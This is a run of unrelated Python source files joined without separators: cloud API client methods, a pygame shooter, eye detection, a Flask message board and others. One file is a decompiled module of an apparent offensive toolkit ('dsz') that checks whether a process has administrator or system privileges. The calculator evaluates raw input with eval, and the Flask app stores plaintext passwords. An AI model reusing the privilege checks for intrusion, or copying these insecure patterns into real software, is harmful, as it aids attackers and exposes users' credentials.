storage_set_id, "Size": size, "Encrypted": encrypted, "RegionId": region_id, "DiskCategory": disk_category, "ZoneId": zone_id, "StorageSetPartitionNumber": storage_set_partition_number, "Tag": list_of_tag, "Arn": list_of_arn, "KMSKeyId": kms_key_id, "AdvancedFeatures": advanced_features} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), "Arn": ('Arn', 'list', 'dict', [('Rolearn', 'str', None, None), ('RoleType', 'str', None, None), ('AssumeRoleFor', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def copy_image( self, resource_owner_id=None, image_id=None, resource_owner_account=None, destination_image_name=None, destination_region_id=None, owner_account=None, owner_id=None, encrypted=None, region_id=None, list_of_tag=None, kms_key_id=None, destination_description=None): api_request = APIRequest('CopyImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "DestinationImageName": destination_image_name, "DestinationRegionId": destination_region_id, "OwnerAccount": owner_account, "OwnerId": owner_id, "Encrypted": encrypted, "RegionId": region_id, "Tag": list_of_tag, "KMSKeyId": kms_key_id, "DestinationDescription": destination_description} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def cancel_copy_image( self, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request 
= APIRequest('CancelCopyImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def authorize_security_group_egress( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, region_id=None, ipv6_dest_cidr_ip=None, ipv6_source_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, dest_group_id=None, owner_id=None, dest_group_owner_account=None, priority=None, dest_cidr_ip=None, dest_group_owner_id=None): api_request = APIRequest('AuthorizeSecurityGroupEgress', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "RegionId": region_id, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "DestGroupId": dest_group_id, "OwnerId": owner_id, "DestGroupOwnerAccount": dest_group_owner_account, "Priority": priority, "DestCidrIp": dest_cidr_ip, "DestGroupOwnerId": dest_group_owner_id} return self._handle_request(api_request).result def authorize_security_group( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, source_group_owner_id=None, source_group_owner_account=None, region_id=None, ipv6_source_cidr_ip=None, ipv6_dest_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, owner_id=None, priority=None, dest_cidr_ip=None, source_group_id=None): api_request = APIRequest('AuthorizeSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "SourceGroupOwnerId": source_group_owner_id, "SourceGroupOwnerAccount": source_group_owner_account, "RegionId": region_id, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "OwnerId": owner_id, "Priority": priority, "DestCidrIp": dest_cidr_ip, "SourceGroupId": source_group_id} return self._handle_request(api_request).result def attach_disk( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, disk_id=None, owner_id=None, device=None, delete_with_instance=None): api_request = APIRequest('AttachDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DiskId": disk_id, "OwnerId": owner_id, "Device": device, "DeleteWithInstance": delete_with_instance} return self._handle_request(api_request).result def associate_eip_address( self, 
resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, instance_type=None, allocation_id=None, owner_id=None): api_request = APIRequest('AssociateEipAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "InstanceType": instance_type, "AllocationId": allocation_id, "OwnerId": owner_id} return self._handle_request(api_request).result def allocate_public_ip_address( self, ip_address=None, resource_owner_id=None, instance_id=None, resource_owner_account=None, vlan_id=None, owner_account=None, owner_id=None): api_request = APIRequest('AllocatePublicIpAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "IpAddress": ip_address, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "VlanId": vlan_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def allocate_eip_address( self, activity_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, bandwidth=None, client_token=None, internet_charge_type=None, isp=None, owner_account=None, owner_id=None): api_request = APIRequest('AllocateEipAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ActivityId": activity_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Bandwidth": bandwidth, "ClientToken": client_token, "InternetChargeType": internet_charge_type, "ISP": isp, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result 0 import time, math import pygame as pg import config def spritecollide_sub(sprite, sub, dokill): ''' for quad_rect, tiles in sub.quadrants.items(): if sprite.rect.colliderect(quad_rect): for tile in pg.sprite.spritecollide(sprite, tiles, False): walls.add(*tile.room.walls)''' ''' quadrants = sprite.rect.collidelistall(sub.quadrant_rects) tiles = [tile for quad in quadrants for tile in sub.quadrant_tiles[quad]] walls = [wall for tile in tiles for wall in tile.room.walls] ''' walls = [wall for tile in pg.sprite.spritecollide(sprite, sub.tiles, False) for wall in tile.room.walls] collisions = pg.sprite.spritecollide(sprite, walls, dokill) return collisions #pg.init() # Necessary? 
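# A hedged, illustrative sketch (not part of the original module): spritecollide_sub()
# above narrows wall collision tests to the walls owned by the sub tiles a sprite
# currently overlaps, instead of testing every wall in the level. Assuming a `game`
# object that exposes `sub` the way the classes below use it (a container whose
# tiles carry `room.walls`), a projectile could be culled on impact like this:
def kill_on_wall_hit(projectile, game):
    """Remove a projectile sprite as soon as it touches any nearby wall."""
    if spritecollide_sub(projectile, game.sub, False):
        projectile.kill()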
class Player(pg.sprite.Sprite): size = 16 hitbox_size = math.sqrt(2 * size ** 2) def __init__(self, game, pos): super().__init__() self.game = game #self.game.all_sprites.add(self, layer=config.SPRITE_LAYER) self.pos = pg.Vector2(pos) self.vel = pg.Vector2() self.collisions = True self.image_base = pg.Surface((self.size, self.size), pg.SRCALPHA) self.image_base.fill(config.GREEN) self.rect = pg.Rect(0, 0, self.hitbox_size, self.hitbox_size) self.rect.center = self.pos - self.game.screen_pos self.rotation = 0 self.inventory = [None] * 9 self.inventory[0] = HandBlaster.from_owner(self) self._equipped_item = 0 self.equipped_item = 0 @property def equipped_item(self): return self.inventory[self._equipped_item] @equipped_item.setter def equipped_item(self, index): if self.equipped_item is not None: self.equipped_item.is_active = False self._equipped_item = index if self.equipped_item is not None: self.equipped_item.is_active = True def pickup_item(self, item): try: self.inventory[self.inventory.index(None)] = item item.owner = self item.is_item = False except IndexError: print("Inventory full: item not picked up.") def update(self): mouse = pg.mouse.get_pressed() keys = pg.key.get_pressed() num_keys = keys[pg.K_1:pg.K_9 + 1] if any(num_keys): self.equipped_item = num_keys.index(1) if mouse[0]: self.primary_action() #if keys[pg.K_e]: if keys[pg.K_a]: self.vel.x -= config.PLAYER_ACCEL if keys[pg.K_d]: self.vel.x += config.PLAYER_ACCEL if keys[pg.K_s]: self.vel.y += config.PLAYER_ACCEL if keys[pg.K_w]: self.vel.y -= config.PLAYER_ACCEL self.update_position() def update_position(self): self.rotation = (pg.Vector2(pg.mouse.get_pos()) - self.rect.center).angle_to((1, 0)) self.image = pg.transform.rotate(self.image_base, self.rotation) if self.vel.magnitude() > config.PLAYER_MAX_SPEED: self.vel.scale_to_length(config.PLAYER_MAX_SPEED) if self.vel.magnitude() > 0: self.vel -= self.vel * config.PLAYER_FRICTION if abs(self.vel.x) < config.PLAYER_MIN_VEL: self.vel.x = 0 if abs(self.vel.y) < config.PLAYER_MIN_VEL: self.vel.y = 0 center = self.rect.center self.rect.size = (self.hitbox_size, self.hitbox_size) self.rect.center = center self.rect.x += self.vel.x if self.collisions: #t1 = time.clock() #c = #print(time.clock() - t1) for wall in spritecollide_sub(self, self.game.sub, False): if self.vel.x > 0: self.rect.right = wall.rect.left elif self.vel.x < 0: self.rect.left = wall.rect.right self.vel.x = 0 self.rect.y += self.vel.y if self.collisions: for wall in spritecollide_sub(self, self.game.sub, False): if self.vel.y > 0: self.rect.bottom = wall.rect.top elif self.vel.y < 0: self.rect.top = wall.rect.bottom self.vel.y = 0 self.pos.update(self.game.screen_pos + self.rect.center) self.game.screen_pos.update(self.pos - config.SCREEN_MID) self.rect = self.image.get_rect(center=self.pos - self.game.screen_pos) ### unnecessary? 
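# Hedged, standalone sketch (not a method of the Player class above): update_position()
# resolves collisions one axis at a time: move along x, push the rect back out of any
# wall that was hit and zero the x velocity, then repeat for y. Distilled under the
# same assumptions (a sprite with `rect` and `vel`, and a `sub` holding wall tiles),
# the pattern looks like this:
def move_and_collide(sprite, sub):
    # Horizontal step first.
    sprite.rect.x += sprite.vel.x
    for wall in spritecollide_sub(sprite, sub, False):
        if sprite.vel.x > 0:
            sprite.rect.right = wall.rect.left
        elif sprite.vel.x < 0:
            sprite.rect.left = wall.rect.right
        sprite.vel.x = 0
    # Vertical step second, so diagonal movement cannot skip past corners.
    sprite.rect.y += sprite.vel.y
    for wall in spritecollide_sub(sprite, sub, False):
        if sprite.vel.y > 0:
            sprite.rect.bottom = wall.rect.top
        elif sprite.vel.y < 0:
            sprite.rect.top = wall.rect.bottom
        sprite.vel.y = 0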
def primary_action(self): if self.equipped_item is not None: self.equipped_item.action() class HandBlaster(pg.sprite.Sprite): size = (15, 5) cooldown = 100 def __init__(self, game, pos, rotation): super().__init__() self.game = game self.owner = None self.pos = pg.Vector2(pos) self.rotation = rotation self.image_base = pg.Surface(self.size, pg.SRCALPHA) self.image_base.fill(config.RED) self.image = pg.transform.rotate(self.image_base, self.rotation) self.rect = self.image.get_rect() self.rect.center = self.pos - self.game.screen_pos #self._pos_offset = (self.owner.size / 2, self.owner.size / 2) self.last_shot_time = pg.time.get_ticks() self.is_active = True self.is_item = True @classmethod def from_owner(cls, owner): instance = cls(owner.game, owner.pos, owner.rotation) instance.owner = owner instance._pos_offset = (owner.size / 2, owner.size / 2)#### instance.is_item = False return instance @property def is_item(self): return self._is_item @is_item.setter def is_item(self, value): self._is_item = value if self.is_item: self.game.items.add(self) self.owner = None self._pos_offset = 0 else: self.game.items.remove(self) self._pos_offset = (self.owner.size / 2, self.owner.size / 2) @property def is_active(self): return self._is_active @is_active.setter def is_active(self, value): self._is_active = value if self.is_active: self.game.all_sprites.add(self, layer=config.SPRITE_LAYER) self.update() ## else: self.game.all_sprites.remove(self) def update(self): if self.is_active: if self.owner is not None: self.move_to_owner() else: self.rect.center = self.pos - self.game.screen_pos def move_to_owner(self): # Sets the default position of the object (i.e. facing east) to be # at the owner's position with some offset so that it is placed at # the owner's side. self.pos = self.owner.pos + self._pos_offset # A vector describing the displacement from the radius, which the # object will be rotated about, to the object. radial_vector = self.pos - (self.game.screen_pos + self.owner.rect.center) # A vector describing the change in position as the radial vector is # rotated about the radius. self.change_vector = radial_vector.rotate(-(self.owner.rotation + 90)) - radial_vector # Applying the change in position. self.pos += self.change_vector # Applying the rotation to the image. self.image = pg.transform.rotate(self.image_base, self.owner.rotation) # Sets the rect's position to the new position. 
self.rect = self.image.get_rect(center=self.pos - self.game.screen_pos) def action(self): if pg.time.get_ticks() - self.last_shot_time > self.cooldown: mouse_pos = pg.Vector2(pg.mouse.get_pos()) if mouse_pos.distance_to(self.owner.rect.center) > 20: BlasterShot(self, mouse_pos - self.rect.center) self.last_shot_time = pg.time.get_ticks() class PlasmaRailCannon: pass class BlasterShot(pg.sprite.Sprite): size = 6 speed = 16 power = 5 max_range = 5000 max_bounces = 500 _number_of_checks = 2 def __init__(self, blaster, trajectory): super().__init__() self.game = blaster.game self.blaster = blaster self.game.all_sprites.add(self, layer=config.PROJECTILE_LAYER) self.add(self.game.projectiles) #offset = self.blaster.change_vector * 1 #offset.scale_to_length(self.blaster.change_vector.length() + 0) self.pos = self.blaster.pos self.vel = pg.Vector2(trajectory) self.vel.scale_to_length(self.speed) self.image = pg.Surface((self.size, self.size)) self.image.fill(config.GREEN) self.rect = self.image.get_rect() self.rect.center = self.pos - self.game.screen_pos self.bounces = 0 def update(self): self.update_position_bouncy() if self.pos.distance_to(self.game.player.pos) > self.max_range: self.kill() def update_position(self): for i in range(self._number_of_checks): self.pos += self.vel / self._number_of_checks self.rect.center = self.pos - self.game.screen_pos if spritecollide_sub(self, self.game.sub, False): self.kill() def update_position_bouncy(self): if self.bounces < self.max_bounces: for i in range(self._number_of_checks): self.pos.x += self.vel.x / self._number_of_checks self.rect.centerx = self.pos.x - self.game.screen_pos.x if spritecollide_sub(self, self.game.sub, False): self.vel.x *= -1 self.pos.x += self.vel.x / self._number_of_checks self.rect.centerx = self.pos.x - self.game.screen_pos.x self.bounces += 1 self.pos.y += self.vel.y / self._number_of_checks self.rect.centery = self.pos.y - self.game.screen_pos.y if spritecollide_sub(self, self.game.sub, False): self.vel.y *= -1 self.pos.y += self.vel.y #/ self._number_of_checks self.rect.centery = self.pos.y - self.game.screen_pos.y self.bounces += 1 else: self.kill() def main(): print("RUN THE OTHER ONE DAMMIT") if __name__ == "__main__": main() ShivanS93/VAtest_withOKN #!python3 # eye_detection.py - detect eyes using webcam # tutorial: https://www.roytuts.com/real-time-eye-detection-in-webcam-using-python-3/ import cv2 import math import numpy as np def main(): faceCascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml") eyeCascade = cv2.CascadeClassifier("haarcascade_eye.xml") # grab the reference to the webcam # try: vs = cv2.VideoCapture(0) print(vs) while True: ret, frame = vs.read() if frame is None: break gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) gray = cv2.equalizeHist(gray) faces = faceCascade.detectMultiScale(frame) for (x, y, w, h) in faces: roi_gray = gray[y : y + h, x : x + w] roi_color = frame[y : y + h, x : x + w] eyes = eyeCascade.detectMultiScale(roi_gray) for (ex, ey, ew, eh) in eyes: cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 0, 255), 2) cv2.imshow("Video", frame) key = cv2.waitKey(1) & 0xFF if key == ord("q") or key == 27: break cv2.destroyAllWindows() if __name__ == "__main__": main() import numpy as np from .domain import Domain class Channel(Domain): name = 'channel' left = 0 right = 5. bottom = 0 top = 5. num_blobs = 5 def __init__(self): self.x1 = 6*5/30 + 0.5*5/30 self.y1 = 0 self.s1 = 1. self.x2 = 0 self.y2 = 6*5/30 + 0.5*5/30 self.s2 = 1. 
def in_domain(self, X,Y): Xp = X.ravel() Yp = Y.ravel() d1 = -self.s1 * (Xp-self.x1) + (Yp-self.y1) d2 = -self.s2 * (Xp-self.x2) + (Yp-self.y2) bval = np.logical_and( d1 > 0 , d2 < 0 ) return bval.astype(int).reshape( X.shape ) def bc(self,x,y): idx = -np.ones( (x.size) ).astype(int) return idx def bc_id(self,bid): return bid[0] def vertex2bc(self, x, y): d1 = -self.s1 * (x-self.x1) + (y-self.y1) d2 = -self.s2 * (x-self.x2) + (y-self.y2) r1 = -1*(np.abs(d1)<1e-14) r2 = -1*(np.abs(d2)<1e-14) left = -2*(np.abs(x-self.left)<1e-14) right = -2*(np.abs(x-self.right)<1e-14) top = -2*(np.abs(y-self.top)<1e-14) bot = -2*(np.abs(y-self.bottom)<1e-14) bc = r1+r2+top+bot+left+right decided = np.where(np.logical_xor(np.logical_xor(np.logical_xor(np.logical_xor(np.logical_xor(r1, r2), top), bot), left), right)) out = np.zeros(x.shape) out[decided] = bc[decided] return out def curved_points(self,wgt,X1,Y1,X2,Y2): points = np.zeros( (X1.shape[0], wgt.size, 2) ) points[:,:,0] = wgt[None,:]*X1[:,None] + (1.-wgt[None,:])*X2[:,None] points[:,:,1] = wgt[None,:]*Y1[:,None] + (1.-wgt[None,:])*Y2[:,None] return points # uncompyle6 version 2.9.10 # Python bytecode 2.7 (62211) # Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10) # [GCC 6.2.0 20161005] # Embedded file name: __init__.py import dsz def _getWellKnownSid(name): x = dsz.control.Method() dsz.control.echo.Off() if not dsz.cmd.Run('sidlookup -wellknown %s' % name, dsz.RUN_FLAG_RECORD): return name name = dsz.cmd.data.Get('Sid::Name', dsz.TYPE_STRING) return name[0] def GetGroups(id=0): idStr = '' if id != 0: idStr = '-id %s' % id x = dsz.control.Method() dsz.control.echo.Off() if not dsz.cmd.Run('processinfo %s' % idStr, dsz.RUN_FLAG_RECORD): raise RuntimeError, 'Command failed' return dsz.cmd.data.Get('ProcessInfo::Groups::Group::Name', dsz.TYPE_STRING) def IsInAdminGroup(id=0): name = _getWellKnownSid('Administrators') return IsInGroup(name, id) def IsInGroup(groupName, id=0): name = groupName.lower() try: groups = GetGroups(id) for group in groups: if name == group.lower(): return True except: pass return False def IsInUsersGroup(id=0): name = _getWellKnownSid('Users') return IsInGroup(name, id) def IsSystem(id=0): name = _getWellKnownSid('System') user = dsz.process.GetUser(id) return user.lower() == name.lower()Lunderberg/tvm-vta100-1000 #!/usr/bin/env python # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os, sys import argparse def set_attrs(fname, fname_out, dsp=False, verbose=True): """Set attributes to precompiled verilog code to indicate synthesis preference. Parameters ---------- fname : str The name of input verilog source code file. fname_out : str The name of output verilog source code file. 
""" out = "" with open(fname, 'rt') as fp: module = '' for idx, line in enumerate(fp): if 'module' in line: module = line[line.find('module')+7:line.find('(')] out += line elif " * " in line: if dsp: line = line.replace(" * ", ' * (* multstyle="dsp" *) ') else: line = line.replace(" * ", ' * (* multstyle="logic" *) ') if verbose: print(fname_out+":"+str(idx+1)+": "+module+":"+line[1:line.find(";")+1]) out += line elif "rA;" in line: line = line.replace("rA;", 'rA /* synthesis noprune */;') if verbose: print(fname_out+":"+str(idx+1)+": "+module+":"+line[1:line.find(";")+1]) out += line elif "rB;" in line: line = line.replace("rB;", 'rB /* synthesis noprune */;') if verbose: print(fname_out+":"+str(idx+1)+": "+module+":"+line[1:line.find(";")+1]) out += line elif "rC;" in line: line = line.replace("rC;", 'rC /* synthesis noprune */;') if verbose: print(fname_out+":"+str(idx+1)+": "+module+":"+line[1:line.find(";")+1]) out += line else: out += line with open(fname_out, 'wt') as fp: fp.write(out) if __name__=="__main__": parser = argparse.ArgumentParser(description='Set attributes to precompiled ' + 'verilog code to indicate synthesis preference') parser.add_argument('-i', '--input', type=str, default='VTA.DefaultDe10Config.v', help='input verilog file to be decorated') parser.add_argument('-o', '--output', type=str, default='IntelShell.v', help='decorated verilog file') parser.add_argument('--dsp', default=False, action='store_true', help='use dsp instead of logic.') parser.add_argument('--verbose', default=False, action='store_true', help='print output file name and decorated lines.') args = parser.parse_args() set_attrs(args.input, args.output, args.dsp, args.verbose) from django.contrib.auth.models import AbstractBaseUser from django.db import models class CustomUserNonUniqueUsername(AbstractBaseUser): "A user with a non-unique username" username = models.CharField(max_length=30) USERNAME_FIELD = 'username' class Meta: app_label = 'auth' class CustomUserNonListRequiredFields(AbstractBaseUser): "A user with a non-list REQUIRED_FIELDS" username = models.CharField(max_length=30, unique=True) date_of_birth = models.DateField() USERNAME_FIELD = 'username' REQUIRED_FIELDS = 'date_of_birth' class Meta: app_label = 'auth' class CustomUserBadRequiredFields(AbstractBaseUser): "A user with a USERNAME_FIELD that appears in REQUIRED_FIELDS (invalid)" username = models.CharField(max_length=30, unique=True) date_of_birth = models.DateField() USERNAME_FIELD = 'username' REQUIRED_FIELDS = ['username', 'date_of_birth'] class Meta: app_label = 'auth' # LIFO Stack DS using Python Lists (Arrays) class StacksArray: def __init__(self): self.stackArray = [] def __len__(self): return len(self.stackArray) def isempty(self): return len(self.stackArray) == 0 def display(self): print(self.stackArray) def top(self): return self.stackArray[-1] def pop(self): if self.isempty(): print("Stack is empty") return None return self.stackArray.pop() def push(self, element): self.stackArray.append(element) if __name__ =='__main__': S = StacksArray() S.push(5) S.push(3) S.display() print(len(S)) print(S.pop()) print(S.isempty()) print(S.pop()) print(S.isempty()) S.push(7) S.push(9) print(S.top()) S.push(4) print(len(S)) print(S.pop()) S.push(6) S.push(8) print(S.pop()) import os import pathlib def home_is_where_this_file_is(): """Changes the working directory to wherever this file is located.""" current_working_directory = pathlib.Path.cwd() file_home_directory = pathlib.PurePath(__file__).parent if current_working_directory == 
file_home_directory: return else: os.chdir (file_home_directory) from sqlalchemy_1_3.testing import eq_ from sqlalchemy_1_3.testing import expect_deprecated from sqlalchemy_1_3.testing import fixtures from sqlalchemy_1_3.util.deprecations import warn_deprecated_limited from sqlalchemy_1_3.util.langhelpers import _hash_limit_string class WarnDeprecatedLimitedTest(fixtures.TestBase): __backend__ = False def test_warn_deprecated_limited_text(self): with expect_deprecated("foo has been deprecated"): warn_deprecated_limited( "%s has been deprecated [%d]", ("foo", 1), "1.3" ) def test_warn_deprecated_limited_cap(self): """warn_deprecated_limited() and warn_limited() use _hash_limit_string actually just verifying that _hash_limit_string works as expected """ occurrences = 100 cap = 10 printouts = set() messages = set() for i in range(occurrences): message = _hash_limit_string( "this is a unique message: %d", cap, (i,) ) printouts.add(str(message)) messages.add(message) eq_(len(printouts), occurrences) eq_(len(messages), cap) GUI Applications/calc2short.py from tkinter import Tk from tkinter import Entry from tkinter import Button from tkinter import StringVar t=Tk() t.title("") t.geometry("425x300") t.resizable(0,0) t.configure(background="black")#back ground color a=StringVar() def show(c): a.set(a.get()+c) def equal(): x=a.get() a.set(eval(x)) def clear(): a.set("") e1=Entry(font=("",30),justify="right",textvariable=a) e1.place(x=0,y=0,width=425,height=50) b=[Button()]*16 data=["7","8","9","+","4","5","6","-","1","2","3","*","C","0","=","/"] k=0 x=5 y=55 for i in range(4): for j in range(4): b[k]=Button(text=data[k],font=("",25),bg="gray",fg="white",activebackground="yellow",command=lambda c=data[k]: equal() if c=="=" else clear() if c=="C" else show(c)) b[k].place(x=x,y=y,width=100,height=50) k+=1 x+=105 x=5 y+=55 t.mainloop()pgThiago/Learning-Python1-10 # Write a program that reads a person's full name and says whether it contains "SILVA". nome = str(input("Digite seu nome completo: ")).upper().strip().split() print(f"Seu nome tem 'SILVA?' {'SILVA' in nome}") from numpy import product from rest_framework import serializers from product.serializers import ProductSerializer from order.models import Order from product.models import Product class OrderSerializer(serializers.ModelSerializer): products = ProductSerializer(read_only=True, many=True) products_ids = serializers.PrimaryKeyRelatedField( queryset=Product.objects.all(), write_only=True, many=True) total = serializers.SerializerMethodField() def get_total(self, instance): total = sum([product.price for product in instance.products.all()]) return total class Meta: model = Order fields = ["products", "total", 'products_ids', 'user'] extra_kwargs = {'product': {'required': False}} def create(self, validated_data): product_data = validated_data.pop('products_ids') order = Order.objects.create(**validated_data) for product in product_data: order.products.add(product) return order 100-1000 # This code is a bit ...messy and includes some workarounds # It functions fine, but needs some cleanup # Checked the DecimalEncoder and Checks workarounds 20200402 and no progression towards fix import boto3, json, os, decimal SM_ARN = 'YOUR_STATEMACHINE_ARN' sm = boto3.client('stepfunctions') def lambda_handler(event, context): # Print event data to logs ..
print("Received event: " + json.dumps(event)) # Load data coming from APIGateway data = json.loads(event['body']) data['waitSeconds'] = int(data['waitSeconds']) # Sanity check that all of the parameters we need have come through from API gateway # Mixture of optional and mandatory ones checks = [] checks.append('waitSeconds' in data) checks.append(type(data['waitSeconds']) == int) checks.append('preference' in data) checks.append('message' in data) if data.get('preference') == 'sms': checks.append('phone' in data) if data.get('preference') == 'email': checks.append('email' in data) # if any checks fail, return error to API Gateway to return to client if False in checks: response = { "statusCode": 400, "headers": {"Access-Control-Allow-Origin":"*"}, "body": json.dumps( { "Status": "Success", "Reason": "Input failed validation" }, cls=DecimalEncoder ) } # If none, start the state machine execution and inform client of 2XX success :) else: sm.start_execution( stateMachineArn=SM_ARN, input=json.dumps(data, cls=DecimalEncoder) ) response = { "statusCode": 200, "headers": {"Access-Control-Allow-Origin":"*"}, "body": json.dumps( {"Status": "Success"}, cls=DecimalEncoder ) } return response # This is a workaround for: http://bugs.python.org/issue16535 # Solution discussed on this thread https://stackoverflow.com/questions/11942364/typeerror-integer-is-not-json-serializable-when-serializing-json-in-python # https://stackoverflow.com/questions/1960516/python-json-serialize-a-decimal-object # Credit goes to the group :) class DecimalEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, decimal.Decimal): return int(obj) return super(DecimalEncoder, self).default(obj) lcgooder/Message-Board # coding=utf-8 import os from sqlite3 import dbapi2 as sqlite3 from flask import Flask, request, session, g, redirect, url_for, abort, \ render_template, flash, current_app from flask_moment import Moment from datetime import datetime import time app = Flask('demo') moment = Moment(app) app.config.update(dict( DATABASE=os.path.join(app.root_path, 'demo.db'), DEBUG=False, SECRET_KEY=b'_5#y2L"F4Q8z\n\xec]/', USERNAME='admin', PASSWORD='' )) def connect_db(): """Connects to the specific database.""" rv = sqlite3.connect(current_app.config['DATABASE']) rv.row_factory = sqlite3.Row return rv def get_db(): """Opens a new database connection if there is none yet for the current application context. 
""" if not hasattr(g, 'sqlite_db'): g.sqlite_db = connect_db() return g.sqlite_db def init_db(): """Initializes the database.""" with app.app_context(): db = get_db() with app.open_resource('./schema.sql', mode='r') as f: db.cursor().executescript(f.read()) db.commit() @app.teardown_appcontext def close_db(error): """Closes the database again at the end of the request.""" if hasattr(g, 'sqlite_db'): g.sqlite_db.close() @app.route('/') def show_entries(): db = get_db() cur = db.execute('select title, text, rec, user from entries order by id desc') entries = cur.fetchall() return render_template('show_entries.html', entries=entries, current_time=datetime.utcnow(), conv=datetime.strptime) @app.route('/add', methods=['POST']) def add_entry(): if not session.get('logged_in'): abort(401) db = get_db() db.execute('insert into entries (title, text, rec, user) values (?, ?, ?, ?)', [request.form['title'], request.form['text'], datetime.utcnow(), session['username']]) db.commit() flash('New message was successfully posted') return redirect(url_for('show_entries')) @app.route('/signup', methods=['GET', 'POST']) def signup(): error = None if request.method == 'POST': username = request.form['username'] inputpw = request.form['password'] confirm = request.form['confirm_password'] db = get_db() cur = db.execute('SELECT `username` FROM user WHERE username = ?',[username]) if cur.fetchone(): error = 'Duplicated Username!' elif inputpw != confirm: error = 'Unmatched Confirm!' else: db.execute('insert into user (username, password) values (?, ?)', [request.form['username'], request.form['password']]) db.commit() flash('Sign Up Secceed!') return redirect(url_for('login')) return render_template('signup.html', error=error, current_time=datetime.utcnow(), conv=datetime.strptime) @app.route('/login', methods=['GET', 'POST']) def login(): error = None if request.method == 'POST': username = request.form['username'] password = request.form['password'] db = get_db() cur = db.execute('SELECT `username`, `password` FROM user WHERE username = ?',[username]) data = cur.fetchone() if (not data) or password != data[1]: error = 'Invalid username or password' else: session['username'] = username session['logged_in'] = True flash('You were logged in') return redirect(url_for('show_entries')) return render_template('login.html', error=error, current_time=datetime.utcnow(), conv=datetime.strptime) @app.route('/logout') def logout(): session.pop('logged_in', None) session.pop('username', None) flash('You were logged out') return redirect(url_for('show_entries')) #init_db() #app.run(port=5001, debug=True) FHIRPower/SepsisPredictor/__init__.py default_app_config = 'SepsisPredictor.apps.SepsisPredictorConfig'tests/unit/conftest.py # Copyright 2021 Red Hat Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
